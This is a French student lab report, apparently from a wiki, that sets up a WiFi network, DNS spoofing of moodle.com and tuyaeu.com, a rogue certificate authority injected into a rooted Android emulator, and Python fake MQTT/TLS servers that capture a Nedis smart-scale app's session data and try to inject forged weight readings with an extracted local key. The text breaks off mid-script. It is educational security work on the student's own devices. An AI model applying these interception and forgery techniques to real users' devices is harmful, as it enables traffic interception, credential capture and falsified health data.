netmask 255.255.255.0
gateway 172.26.145.251
# post-up ethtool -K eth0 tx off

auto eth1
iface eth1 inet static
address 172.16.10.0/24
#
# The commented out line above will disable TCP checksumming which
# might resolve problems for some users. It is disabled by default
#

</syntaxhighlight>

On vérifie avec la commande <code>ip a</code><syntaxhighlight lang="linux-config">
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:41 brd ff:ff:ff:ff:ff:ff
inet 172.26.145.110/24 brd 172.26.145.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 2001:660:4401:6050:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 853sec preferred_lft 753sec
inet6 2a01:c916:2047:c850:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 2591853sec preferred_lft 604653sec
inet6 fe80::216:3eff:fe23:7441/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:42 brd ff:ff:ff:ff:ff:ff
inet 172.16.10.0/24 brd 172.16.10.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::216:3eff:fe23:7442/64 scope link
valid_lft forever preferred_lft forever

</syntaxhighlight>

Et on constate que notre serveur a accès à Internet avec la commande <code>ping 8.8.8.8</code>

= Point d'accès WiFi (29/09) =
Pour l'instant, nous mettons de côté ce point du TP car il n'est pas utile pour la suite.

= Sécurisation WiFi par WPA2-PSK =

Pour communiquer avec le routeur <code>Cisco</code>, on branche le port série en USB et on se connecte avec la commande <code>minicom -D /dev/ttyUSB0 -b 9600</code>. La première étape fut la création du SSID <code>SE5-SSID10</code>.<syntaxhighlight lang="linux-config">
dot11 ssid SE5-SSID10

vlan 410

authentication open

authentication key-management wpa version 2

wpa-psk ascii Cisco2025

exit
</syntaxhighlight>
Puis, on configure l'interface <code>Dot11Radio0</code><syntaxhighlight lang="linux-config">
interface dot11radio 0

encryption mode ciphers aes-ccm

ssid SE5-SSID10

station-role root

no shutdown
</syntaxhighlight>Après cela, on retourne sur notre serveur virtuel et on y implémente un serveur DHCP pour l'attribution des IP aux machines se connectant sur le routeur. On retrouve cette configuration dans <code>/etc/dhcp/dhcpd.conf</code><syntaxhighlight lang="linux-config">
# dhcpd.conf

option domain-name "plil.info";
option domain-name-servers ns.plil.info;

default-lease-time 600;
max-lease-time 7200;

ddns-update-style none;

authoritative;

subnet 172.16.10.0 netmask 255.255.255.0 {
range 172.16.10.100 172.16.10.200;
option domain-name-servers 172.16.10.1;
option routers 172.16.10.1;
default-lease-time 600;
max-lease-time 7200;
}
</syntaxhighlight>Puis, on implémente un serveur DNS minimal dans le fichier <code>/etc/bind/named.conf.options</code><syntaxhighlight lang="linux-config">
options {
directory "/var/cache/bind";

recursion yes;
allow-query {172.16.10.0/24; 127.0.0.1;};

forwarders {
8.8.8.8;
1.1.1.1;
};

dnssec-validation auto;

listen-on {127.0.0.1; 172.16.10.1;};
listen-on-v6 { none; };
};
</syntaxhighlight>Et enfin, on met en place une mascarade entre le VLAN 410 et le routeur du réseau des salles de projets pour donner l'accès à Internet.<syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

= Interception de flux (30/09) =

== Redirection par DNS ==
Pour cette partie, on va ajouter une zone primaire à notre serveur DNS avec le nom Internet du site que l'on veut rediriger vers notre machine.

Ici, ce sera le merveilleux <code>moodle.com</code>

D'abord, on modifie <code>/etc/bind/named.conf.local</code><syntaxhighlight lang="linux-config">
//
// Do any local configuration here
//

// Consider adding the 1918 zones here, if they are not used in your
// organization
//include "/etc/bind/zones.rfc1918";

zone "moodle.com" {
type master;
file "/etc/bind/db.moodle.com";
};
</syntaxhighlight>Puis, on crée la fameuse zone <code>db.moodle.com</code> dans le même répertoire <syntaxhighlight lang="linux-config">
$TTL 200
@ IN SOA ns.moodle.com. admin.moodle.com. (
5 ;
3600 ;
1800 ;
604800 ;
86400 ;
)
IN NS ns.moodle.com.
ns IN A 172.16.10.1
@ IN A 172.16.10.1
www IN CNAME ns
</syntaxhighlight>Pour vérifier si notre configuration est correcte, on exécute ces deux commandes :

<code>sudo named-checkconf</code>

<code>sudo named-checkzone moodle.com /etc/bind/db.moodle.com</code>

== Redirection réseau ==
Dans cette partie, on ajoute une règle <code>iptables</code> pour rediriger le flux TCP vers un port local, le <code>8080</code>.

<code>iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-ports 8080</code><syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
0 0 REDIRECT 6 -- eth0 * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 redir ports 8080

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

== Serveur apache sécurise (04/10) ==

Dans un premier temps, on va créer un certificat auto-signé :

<code>openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/apache/apache-selfsigned.key -out /etc/ssl/apache/apache-selfsigned.crt -subj "/C=FR/ST=Nord/L=Lille/O=Popo/CN=moodle.com"</code>

Puis, on configure <code>Apache2</code>
<syntaxhighlight lang="linux-config">
GNU nano 7.2 /etc/apache2/sites-available/secure-site.conf
<VirtualHost *:443>
ServerName moodle.com

DocumentRoot /var/www/html

SSLEngine on
SSLCertificateFile /etc/ssl/apache/apache.crt
SSLCertificateKeyFile /etc/ssl/apache/apache.key

# Optionnel : log
ErrorLog ${APACHE_LOG_DIR}/ssl-error.log
CustomLog ${APACHE_LOG_DIR}/ssl-access.log combined
</VirtualHost>

# Redirection HTTP ^f^r HTTPS
<VirtualHost *:80>
ServerName moodle.com
Redirect permanent / https://moodle.com/
</VirtualHost>
</syntaxhighlight>

Maintenant, en prévision de la suite (voir explication dans Machine virtuelle Android), on va créer une autorité de certification nommée CertiFiable :

<code>openssl req -x509 -new -nodes -keyout ca.key -sha256 -days 365 -out ca.crt -subj "/CN=CertiFiable"</code>

Puis, on vient générer une demande de signature de certificat :

<code>openssl req -new -newkey rsa:2048 -nodes -keyout apache.key -out apache.csr -subj "/CN=moodle.com"</code>

Enfin, on vient signer le site avec le certificat de CertiFiable :

<code>openssl x509 -req -in apache.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out apache.crt -days 365 -sha256</code>

= Machine virtuelle <code>android</code> =

== Première tentative ==
Actuellement, si on navigue sur internet et que l'on se rend sur moodle.com, on atterrit bien sûr le faux Moodle, mais comme le téléphone ne connait pas l'autorité de certification nommé CertiFiable, on a le droit à ce magnifique message de connexion non sécurisée :

[[Fichier:Avertissement moodle.png|sans_cadre]][[Fichier:Moodle le magnifique.png|sans_cadre]]

Malheureusement, il est aujourd'hui impossible d'ajouter facilement une autorité de certification sur son téléphone.

C'est pour cela qu'une solution proposée est d'installer une machine virtuelle d'une ancienne version d'<code>Android</code> où il était possible d'en ajouter.

En ayant suivi ce tuto (https://help.clouding.io/hc/en-us/articles/4405454393756-How-to-virtualize-Android-with-QEMU-KVM), j'ai réussi à installer une VM sur Zabeth4 (j'ai dû prendre une autre iso car celle du site était inaccessible).

J'ai installé <code>VNC Viewer</code> pour pouvoir manipuler la machine virtuelle.

En étant sur la VM, j'ai pu me rendre compte qu'il n'était pas possible de se connecter au WiFi, c'est la connexion du pc qui est simulé comme un réseau WiFi dans la VM.

J'ai pu réfléchir à deux solutions avant que la VM ne crash d'elle-même et soit impossible à redémarrer...

La première est toute simple, connecter la Zabeth directement au WiFi, ce qui est difficile à distance. La seconde, qui est je pense possible, est de changer la carte réseau dans les fichiers de conf de la VM pour mettre celle supportant le WiFi.

Je n'ai donc pu tester aucune de ces deux solutions, la VM n'étant plus.

== Seconde tentative ==

Pour cette seconde tentative, j'utilise les commandes suivantes avec plusieurs ISO Android.<syntaxhighlight lang="linux-config">
qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw
qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw -cdrom *android-x86*.iso -boot d
qemu-system-x86_64 -m 2048 -enable-kvm -cpu host -smp 2 -display sdl -drive file=android.img,format=raw,if=virtio -usb -device usb-host,vendorid=0x148f,productid=0x5370
</syntaxhighlight>J'ai pu donc pu faire face:

- À un ISO sans les services Google et sans navigateur ...

- Un trop ancien pour Nedis

- Un qui refuse l'installation d'APK

- Un trop récent pour l'installation de certificat.

- Un qui refuse de se laisser root

En fin de séance, je n'ai malheureusement pas de VM Android fonctionnelle.

== Ultime tentative (qui marche) ==
Cette fois ci j'utilise l'application Android Studio qui permet d'émuler des téléphones Android pour le débogage d'application. On va donc s'en servir pour créer un Android routé qui va recevoir notre certificat.

Dans un premier temps j'ai donc routé mon téléphone avec l'utilitaire Magisik en suivant ce tutoriel : https://www.youtube.com/watch?v=QzsNn3GhYYk&t=374s.

Puis je viens ajouter un module dans Magisk qui permet de recharger à chaque demarrage du téléphone le certificat en question.

Le certificat peut être ajouter dans le téléphone en utilisant la commande <code>adb push xyzxyzxyz.0</code> .

La manipulation est la suivante :<syntaxhighlight lang="linux-config">
adb shell
su
cd /data/adb/modules/
mkdir -p tuya_cert/system/etc/security/cacerts
echo "id=tuya_cert" > tuya_cert/module.prop echo "name=Tuya Certificate Injection" >> tuya_cert/module.prop echo "version=1.0" >> tuya_cert/module.prop echo "versionCode=1" >> tuya_cert/module.prop echo "author=Victo" >> tuya_cert/module.prop echo "description=Injecte le certificat Tuya dans le systeme" >> tuya_cert/module.prop
touch tuya_cert/auto_mount
cp /sdcard/Download/26e33623.0 /data/adb/modules/tuya_cert/system/etc/security/cacerts/
chmod 644 /data/adb/modules/tuya_cert/system/etc/security/cacerts/26e33623.0
chown root:root /data/adb/modules/tuya_cert/system/etc/security/cacerts/26e33623.0
reboot
</syntaxhighlight>On a donc maintenant une VM Android avec notre certificat. Il faut maintenant que le PC qui host cette VM soit connecté à notre borne WiFi pour pouvoir constater que notre site Moodle.com est bien redirigé et sécurisé.

= Machine <code>Android</code> (06/10) =
Pour cette dernière partie, j'ai retrouvé une tablette sous <code>Android 4.4 KitKat</code> qui permet d'ajouter des autorités de certification.

C'est donc ce que j'ai fait :

[[Fichier:Photo_certifiable.png|sans_cadre]]

Maintenant, on constate en se connectant sur moodle.com à partir de cette tablette que l'on est bien redirigé vers le faux site et qu'il est sécurisé avec le magnifique cadenas vert.

[[Fichier:Photo moodle.png|sans_cadre]]

(cette page web date du 06/10/25, elle n'est plus valable depuis le 10/10/25...)

= Nedis Wi-Fi Smart Personal Scales =

Dans ce second TP, nous allons jouer avec ce pèse personne de nedis.

Dans un premier temps, j'ai connecté la balance au réseau SE5-SSID10.

Puis j'ai remarqué que quand je tentais de me peser, la balance affichait err2.

Après une courte investigation, il s'agit d'une balance qui émet des signaux électriques pour analyser la composition corporelle donc si on se pèse avec des chaussures, cela pose problème.

Pour la suite du projet, on se pèsera avec les mains.

[[Fichier:Poid_sur_app_nedis.png|sans_cadre]]

== Redirection du poids vers notre serveur ==
Dans un premier temps, mon idée était de faire croire à la balance qu'elle communique effectivement avec son serveur pour pouvoir récupérer les informations sur la santé de l'utilisateur.

Ici on constate sur ces paquets la requête de la balance pour obtenir une IP, puis le moment ou elle l'obtient.

[[Fichier:WS connection balance.png|sans_cadre|858x858px]]

Je peux donc ping ma balance depuis mon pc (celui qui host ma VM android)

[[Fichier:PIng balance.png|sans_cadre]]

Maintenant je veux voir les messages de communication entre la balance, son serveur et l'application, pour ce faire je fais <code>tcpdump -i eth1 -n port 53</code> :<syntaxhighlight lang="linux-config">
14:46:51.115996 IP 172.16.10.105.49153 > 172.16.10.1.53: 13861+ A? m2.tuyaeu.com. (31)
14:46:51.125611 IP 172.16.10.1.53 > 172.16.10.105.49153: 13861 3/0/0 A 3.120.92.134, A 18.184.31.90, A 35.156.44.172 (79)
14:46:51.168250 IP 172.16.10.105.49153 > 172.16.10.1.53: 59035+ A? a3.tuyaeu.com. (31)
14:46:51.177967 IP 172.16.10.1.53 > 172.16.10.105.49153: 59035 3/0/0 A 18.198.62.99, A 18.158.227.228, A 3.67.116.46 (79)
14:46:51.703179 IP 172.16.10.102.57661 > 172.16.10.1.53: 30982+ AAAA? a1.tuyaeu.com. (31)
14:46:51.706085 IP 172.16.10.102.57662 > 172.16.10.1.53: 15654+ A? a1.tuyaeu.com. (31)
14:46:51.713159 IP 172.16.10.1.53 > 172.16.10.102.57661: 30982 3/0/0 AAAA 2a05:d014:afa:af02:262a:be09:e328:ff21, AAAA 2a05:d014:afa:af01:87dc:dc67:35a1:5bfe, AAAA 2a05:d014:afa:af00:1ee2:1f00:e061:e8bf (115)
14:46:51.715736 IP 172.16.10.1.53 > 172.16.10.102.57662: 15654 3/0/0 A 3.78.92.3, A 35.159.150.3, A 3.121.33.91 (79)

56 packets captured
56 packets received by filter
0 packets dropped by kernel
[4343449.827028] device eth1 left promiscuous mode

</syntaxhighlight>visiblement notre balance communique avec tuya via m2.tuyaeu.com et a3.tuyaeu.com. Par la suite on constate qu'elle communique avec une multitude de XY.tuyaeu.com.

Maintenant on refait une config similaire à moodle.com, une zone "tuyaeu.com" dans le fichier de conf de bind, un fichier db.tuyaeu.com et une page apache. Enfin on vient la signer avec notre autorité de certification.

<code>tcpdump -i eth1 -n port 53</code> :<syntaxhighlight lang="linux-config">

12:30:58.490060 IP 172.16.10.105.49153 > 172.16.10.1.53: 50294+ A? m2.tuyaeu.com. (31)
12:30:58.490174 IP 172.16.10.1.53 > 172.16.10.105.49153: 50294* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)
12:30:58.540041 IP 172.16.10.105.49153 > 172.16.10.1.53: 23785+ A? a3.tuyaeu.com. (31)
12:30:58.540132 IP 172.16.10.1.53 > 172.16.10.105.49153: 23785* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)

</syntaxhighlight>Maintenant on constate que quand la balance demande l'adresse du serveur xy.tuyaeu.com, notre DNS lui répond avec l'IP de notre serveur.

On va créer un faux serveur pour déchiffrer ce que nous dit la balance.<syntaxhighlight lang="linux-config">
root@SE5:/etc/apache2/sites-available# openssl s_server -accept 8886 -cert /etc/ssl/apache/ca.crt -key /etc/ssl/apache/ca.key -debug
Using default temp DH parameters
ACCEPT
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
</syntaxhighlight>On constate que dès que la balance tente de se connecter elle ferme la connexion pour cause "no shared cipher".

Malheureusement, je constate (un peu tard) que notre balance ne pourra pas communiquer avec notre serveur puisque qu'elle ne possède pas le certificat de notre autorité de certification. Elle refuse donc de communiquer avec notre serveur.

Il faudrait réussir un injecter le certificat dans la balance en communicant directement avec elle.

== Envoi de fausses informations vers l'application ==

Dans cette partie, nous allons tenter d'envoyer un poids à l'application depuis notre serveur.

L'appli tape sur 443 et 8883 (mqtt qui fonctionne avec tls) comme on peut le voir sur cet extrait:<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# tcpdump -i eth1 -n src 172.16.10.102 and not port 53

...

11:59:46.829382 IP 172.16.10.102.53314 > 172.16.10.1.443: Flags [.], ack 1257, win 251, length 0
11:59:47.005041 IP 172.16.10.102.54915 > 172.16.10.255.54915: UDP, length 263
11:59:47.295737 IP 172.16.10.102.53313 > 172.16.10.1.8883: Flags [S], seq 3014816869, win 65535, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
11:59:47.346713 IP 172.16.10.102.53315 > 172.16.10.1.443: Flags [S], seq 1755898328, win 65535, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
11:59:47.347853 IP 172.16.10.102.53315 > 172.16.10.1.443: Flags [.], ack 273869652, win 255, length 0
11:59:47.534641 IP 172.16.10.102.53318 > 172.16.10.1.443: Flags [F.], seq 547, ack 1257, win 251, length 0

...

11:59:48.189587 IP 172.16.10.102.53319 > 172.16.10.1.443: Flags [P.], seq 517:547, ack 1256, win 251, length 30
11:59:48.190681 IP 172.16.10.102.53319 > 172.16.10.1.443: Flags [.], ack 1257, win 251, length 0
11:59:48.256593 IP 172.16.10.102.53319 > 172.16.10.1.443: Flags [F.], seq 547, ack 1257, win 251, length 0
11:59:48.324124 IP 172.16.10.102.53313 > 172.16.10.1.8883: Flags [S], seq 3014816869, win 65535, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0

</syntaxhighlight>

On va donc tenter d'envoyer des informations erronés de notre serveur vers notre application.

Dans un premier temps on va tenter d'établir une connexion sécurisé entre l'appli et notre serveur.

Tuya utilise un protocole MQTT pour les échanges de données. On va donc simuler un serveur MQTT en python qui utilise un certificat signé par notre autorité de certification.<syntaxhighlight lang="python3">
import socket
import ssl

CERT_FILE = "/etc/apache2/ssl/tuya.crt"
KEY_FILE = "/etc/apache2/ssl/tuya.key"
PORT = 8883

def start_server():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
try:
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)
except Exception as e:
print(f"impossible de charger les clés SSL\n{e}")
return

bindsocket = socket.socket()
bindsocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
bindsocket.bind(('0.0.0.0', PORT))
bindsocket.listen(5)

print(f"faux Serveur MQTT en écoute sur le port {PORT}...")
print("en attente de l'application Android...")

while True:
try:
newsocket, fromaddr = bindsocket.accept()
print(f"\nconnexion TCP reçue de {fromaddr[0]}")

try:
conn = context.wrap_socket(newsocket, server_side=True)
print(f"handshake SSL réussi")

data = conn.recv(1024)
print(f"données reçues ({len(data)} octets) :")
print(data)

except ssl.SSLError as e:
print(f"échec SSL rejet du certificat.\n{e}")
except Exception as e:
print(f"erreur de lecture : {e}")
finally:
pass

except KeyboardInterrupt:
print("\narrêt.")
break

if __name__ == '__main__':
start_server()
</syntaxhighlight><syntaxhighlight lang="linux-config">
connexion TCP reçue de 172.16.10.102
handshake SSL réussi
données reçues (529 octets) :
b'\x10\x8e\x04\x00\x04MQTT\x04\xce\x00<\x00lcom.nedis.smartlife_mb_e5a1220d6003e352f8b34a81cda1f2bf2e2880ce4093_d8439672c8e94a0c3446d4276d3a2abc_DEFAULT\x00\x0ftuya/smart/will\x00\xfa{"clie
ntId":"com.nedis.smartlife_mb_e5a1220d6003e352f8b34a81cda1f2bf2e2880ce4093_d8439672c8e94a0c3446d4276d3a2abc_DEFAULT","deviceType":"ANDROID","message":"","userName":"e5a1220d6003e352f8b34a81
cda1f2bf2e2880ce4093_d8439672c8e94a0c3446d4276d3a2abc"}\x00up1027735_v1_4dtc78phe7grtfdfv7fp_a4206d71_mb_eu17623708062605mpDdzpA355dad9b8086f63442d98e227e039cf5315158b056398c8fb\x00\x10388c
a5a77b82c5ad'
</syntaxhighlight>On constate à la suite de cela que notre application fait totalement confiance à notre faux serveur. Il faut maintenant le format sous lequel envoyer notre message pour quelle ajoute un poids dans l'application.

On tente donc d'envoyer en clair le poids vers l'application de Nedis<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# cat fake_serv2.py
import socket
import ssl
import time
import json
import struct

# ================= CONFIGURATION =================
CERT_FILE = "/etc/ssl/apache/ssl/tuya.crt"
KEY_FILE = "/etc/ssl/apache/ssl/tuya.key"
PORT = 8883

PAYLOAD_POIDS = {
"protocol": 4,
"t": int(time.time()),
"data": {
"dps": {
"1": 8050,
"2": True,
"3": "kg"
}
}
}
# =================================================

def encode_remaining_length(length):
out = bytearray()
while True:
byte = length % 128
length //= 128
if length > 0:
byte |= 0x80
out.append(byte)
if length == 0:
break
return out

def create_mqtt_packet(pkt_type, flags, payload):
header = bytes([(pkt_type << 4) | flags])
return header + encode_remaining_length(len(payload)) + payload

def start_server():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)

sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("0.0.0.0", PORT))
sock.listen(5)

print(f"[*] Serveur MQTT TLS prêt sur {PORT}")

while True:
client, addr = sock.accept()
print(f"\n[+] Connexion de {addr[0]}")

try:
conn = context.wrap_socket(client, server_side=True)
print("TLS OK")

while True:
header = conn.recv(1)
if not header:
break

pkt_type = header[0] >> 4

# Remaining length
multiplier = 1
remaining_len = 0
while True:
b = conn.recv(1)[0]
remaining_len += (b & 127) * multiplier
multiplier *= 128
if not (b & 128):
break

payload = b""
while len(payload) < remaining_len:
payload += conn.recv(remaining_len - len(payload))

# ================= HANDLERS =================

# CONNECT
if pkt_type == 1:
print(">>> CONNECT reçu")
conn.send(b"\x20\x02\x00\x00")
print("<<< CONNACK envoyé")

# SUBSCRIBE
elif pkt_type == 8:
msg_id = payload[0:2]
topic_len = struct.unpack("!H", payload[2:4])[0]
topic = payload[4:4+topic_len].decode(errors="ignore")

print(f">>> SUBSCRIBE : {topic}")

# SUBACK (QoS 1 accepté)
suback_payload = msg_id + b"\x01"
conn.send(create_mqtt_packet(9, 0x00, suback_payload))
print("<<< SUBACK OK")

# Mapping OUT -> IN
pub_topic = topic.replace("/out/", "/in/")
print(f"Publication sur : {pub_topic}")

time.sleep(0.5)

json_payload = json.dumps(PAYLOAD_POIDS)
topic_bytes = pub_topic.encode()

var_header = struct.pack("!H", len(topic_bytes)) + topic_bytes
packet_payload = var_header + json_payload.encode()

# PUBLISH QoS 1
packet = create_mqtt_packet(3, 0x02, packet_payload)
conn.send(packet)

print(f"Payload envoyé (NON chiffré)")

# PINGREQ
elif pkt_type == 12:
conn.send(b"\xd0\x00")

else:
print(f"Packet MQTT type {pkt_type} ignoré")

except Exception as e:
print(f"Erreur connexion : {e}")

finally:
try:
conn.close()
except:
pass

if __name__ == "__main__":
start_server()

</syntaxhighlight>

On cherche dans le fichier shared_prefs situé dans /data/data/com.nedis.smartlife sur la VM android une clé local qui permettrai de chiffrer le message pour que Nedis l'accepte.<syntaxhighlight lang="linux-config">
emulator64_x86_64_arm64:/data/data/com.nedis.smartlife/shared_prefs # grep -r "localKey"

./sig_mesh_storage.xml: <string name="sig_mesheu176237y8062605m7Ddzpr3a6d803edeb314f364c55d2caab540918">[{"appkey":"2FC5C9F42A44F9D243F960231C370DC6","code":"mebf11e37fc6632a9b44qg","endTime":0,"ivIndex":0,"key":"mebf11e37fc6632a9b44qg","localKey":"674d29fb978a1705","meshId":"mebf11e37fc6632a9b44qg","meshKey":"2FC5C9F42A44F9D243F960231C370DC6","meshkey":"2FC5C9F42A44F9D243F960231C370DC6","name":"D8FBEEA2F2B93F4B63EFD7DA83424BA9","netWorkkey":"D8FBEEA2F2B93F4B63EFD7DA83424BA9","password":"fa1667ca872e46d4","pv":"2.1","resptime":0,"share":false,"startTime":0,"tempShare":false}]</string>
</syntaxhighlight>Je vais apprendre plus tard que cette clé est une clé qui permet de sécuriser l'échange Bluetooth entre la balance et le téléphone lors de la première connexion. Mais avant de le savoir, j'ai tenté d'améliorer le faux serveur avec cette clé.<syntaxhighlight lang="linux-config">
#!/usr/bin/env python3
import socket
import ssl
import time
import json
import struct
import base64
import hashlib
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad

# ================= CONFIG =================
CERT_FILE = "/etc/ssl/apache/ssl/tuya.crt"
KEY_FILE = "/etc/ssl/apache/ssl/tuya.key"
PORT = 8883

# LOCAL KEY 16 caractères
LOCAL_KEY = b"674d29fb978a1705"

# DPS balance (poids correct pour Nedis)
DPS_POIDS = {
"1": 8050, # 80.50 kg
"2": 1, # stable
"3": "kg"
}
# =========================================

# ---------- TUYA CRYPTO ----------
def tuya_encrypt(data: dict, local_key: bytes) -> str:
raw = json.dumps(data, separators=(',', ':')).encode()
cipher = AES.new(local_key, AES.MODE_ECB)
encrypted = cipher.encrypt(pad(raw, 16))
return base64.b64encode(encrypted).decode()

def tuya_sign(enc_data: str, ts: int, local_key: bytes) -> str:
s = f"data={enc_data}&t={ts}&key={local_key.decode()}"
return hashlib.md5(s.encode()).hexdigest()

def build_tuya_payload(dps: dict, device_id: str) -> dict:
ts = int(time.time())
enc = tuya_encrypt({
"devId": device_id,
"dps": dps
}, LOCAL_KEY)
sign = tuya_sign(enc, ts, LOCAL_KEY)
return {
"protocol": 4,
"t": ts,
"data": enc,
"sign": sign
}

def extract_device_id(topic: str) -> str:
return topic.split("/")[-1]

# ---------- MQTT UTILS ----------
def encode_remaining_length(length):
out = bytearray()
while True:
byte = length % 128
length //= 128
if length > 0:
byte |= 0x80
out.append(byte)
if length == 0:
break
return out

def create_mqtt_packet(pkt_type, flags, payload):
header = bytes([(pkt_type << 4) | flags])
return header + encode_remaining_length(len(payload)) + payload

# ---------- SERVER ----------
def start_server():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)

sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("0.0.0.0", PORT))
sock.listen(5)

print(f"[*] Serveur MQTT TLS Tuya prêt sur {PORT}")

published_topics = set()

while True:
client, addr = sock.accept()
print(f"\n[+] Connexion de {addr[0]}")

try:
conn = context.wrap_socket(client, server_side=True)
print("TLS OK")

while True:
header = conn.recv(1)
if not header:
break

pkt_type = header[0] >> 4

# Remaining length
multiplier = 1
remaining_len = 0
while True:
b = conn.recv(1)[0]
remaining_len += (b & 127) * multiplier
multiplier *= 128
if not (b & 128):
break

payload = b""
while len(payload) < remaining_len:
payload += conn.recv(remaining_len - len(payload))

# -------- HANDLERS --------
if pkt_type == 1: # CONNECT
print(">>> CONNECT")
conn.send(b"\x20\x02\x00\x00") # CONNACK OK

elif pkt_type == 8: # SUBSCRIBE
msg_id = payload[0:2]
topic_len = struct.unpack("!H", payload[2:4])[0]
topic = payload[4:4+topic_len].decode(errors="ignore")

print(f">>> SUBSCRIBE : {topic}")
conn.send(create_mqtt_packet(9, 0x00, msg_id + b"\x01")) # SUBACK QoS 1

# Publication automatique
device_id = extract_device_id(topic)
tuya_payload = build_tuya_payload(DPS_POIDS, device_id)
json_payload = json.dumps(tuya_payload)

topic_bytes = topic.encode()
var_header = struct.pack("!H", len(topic_bytes)) + topic_bytes
packet_payload = var_header + json_payload.encode()

# PUBLISH QoS 1
packet = create_mqtt_packet(3, 0x02, packet_payload)
time.sleep(0.5)
conn.send(packet)
print("POIDS TUYA CHIFFRÉ ENVOYÉ")

elif pkt_type == 4: # PUBACK
print("<<< PUBACK")

elif pkt_type == 10: # UNSUBSCRIBE
msg_id = payload[0:2]
conn.send(create_mqtt_packet(11, 0x00, msg_id))
print("<<< UNSUBACK")

elif pkt_type == 12: # PINGREQ
conn.send(b"\xd0\x00")

else:
